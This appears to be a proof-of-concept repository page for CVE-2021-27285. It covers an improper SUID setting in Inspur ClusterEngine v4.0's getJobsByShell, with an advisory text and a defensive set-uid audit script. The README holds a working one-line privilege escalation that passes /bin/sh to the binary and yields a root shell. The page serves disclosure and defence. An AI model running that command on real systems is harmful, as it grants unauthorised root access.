CVE-2021-27285 PoC: Inspur ClusterEngine Security Vulnerability

Source
Associated Vulnerability
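Title: Inspur ClusterEngine Security Vulnerability (CVE-2021-27285)
Description: Inspur ClusterEngine is application software from the Chinese company Inspur. It provides management of jobs submitted by the hardware and software in a cluster system. Inspur ClusterEngine v4.0 contains a security vulnerability that allows an attacker to gain escalated local privileges and execute arbitrary commands via /opt/tsce4/torque6/bin/getJobsByShell.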
Readme
# CVE-2021-27285

The Inspur ClusterEngine cluster management platform is job management software designed specifically for Inspur TianSuo series HPC products. An improper SUID configuration in Inspur ClusterEngine allows non-administrator users to escalate privileges and obtain root access through some of its components.

Inspur ClusterEngine v4.0 has an improper SUID configuration on the [component](getJobsByShell) "/opt/tsce4/torque6/bin/getJobsByShell", which allows non-administrator users to escalate privileges and gain root access via the SUID mechanism.

The privilege escalation process is as follows:

```bash
$ whoami
user1
$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
# whoami
root
#
```

Remediation advice: upgrade the relevant components.
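
A defensive check for the misconfiguration described above, as an added example that is not part of the original README or of Inspur's software: it lists set-uid files under a directory, flags any that are not on an allowlist, and can clear the bit as an interim measure. The function names, labels and allowlist file are assumptions; only the `/opt/tsce4` paths come from the advisory.

```bash
#!/bin/sh
# Added example (not from the README): audit a tree for set-uid files.
# Assumed, not from the page: function names, the allowlist format
# (one absolute path per line) and the "allowed"/"UNEXPECTED" labels.

# is_setuid FILE: succeed if FILE is a regular file with the set-uid bit set.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# audit_setuid DIR [ALLOWLIST]: print "<status> uid=<owner> <path>" for each
# set-uid file under DIR; return 1 if any file is missing from ALLOWLIST.
audit_setuid() {
    dir=$1
    allow=${2:-/dev/null}
    rc=0
    list=$(find "$dir" -xdev -type f -perm -4000 -print 2>/dev/null)
    # Line-based loop: paths containing newlines are not supported.
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        uid=$(ls -ln "$f" | awk '{ print $3 }')
        if grep -Fxq -- "$f" "$allow"; then
            echo "allowed uid=$uid $f"
        else
            echo "UNEXPECTED uid=$uid $f"
            rc=1
        fi
    done <<EOF
$list
EOF
    return "$rc"
}

# strip_setuid FILE: clear the bit as an interim measure until the upgrade is
# applied; anything that relied on the helper running as its owner may break.
strip_setuid() {
    chmod u-s -- "$1" && ! is_setuid "$1"
}

# On an affected host (binary path from the advisory; the allowlist path is
# a hypothetical placeholder):
#   audit_setuid /opt/tsce4 /etc/suid-allowlist.txt
#   is_setuid /opt/tsce4/torque6/bin/getJobsByShell && echo "set-uid bit set"
```

A line reading `UNEXPECTED uid=0 ...` marks a root-owned set-uid file that nobody has reviewed, which is the condition the advisory describes for `getJobsByShell`.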








File Snapshot

[4.0K] /data/pocs/b7cc6625bd5a4ab4ae7cde3bce32ae5f654af028
├── [8.5K] getJobsByShell
└── [1.3K] README.md

0 directories, 2 files